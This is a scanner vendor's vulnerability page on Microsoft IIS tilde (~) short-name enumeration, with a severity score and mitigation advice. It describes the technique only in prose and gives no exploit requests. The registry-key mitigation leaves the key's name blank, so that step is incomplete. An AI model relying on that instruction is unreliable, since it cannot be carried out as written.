Microsoft IIS directory enumeration


Kayran has detected the Microsoft IIS directory enumeration vulnerability.
By using the tilde character (“~”) in a GET or OPTIONS requests, it allows “guessing” short names and extensions of files and directories which have an 8.3 file naming scheme equivalent in Windows versions of Microsoft IIS.

Such vulnerability may lead to an issue especially for .Net based websites which are vulnerable to direct URL access (also known as path aliasing).
An attacker could find important files and folders that are not supposed to be accessible (and visible) to everyone.


CVSS Version 3.x – 6.5 Medium


To prevent this vulnerability, make sure to discard all web requests that are using the tilde character (“~”).
Also, add a registry key named :  

Set the value of the key to 1 to mitigate all 8.3 name related conventions found on the server.


< Return to all Vulnerabilities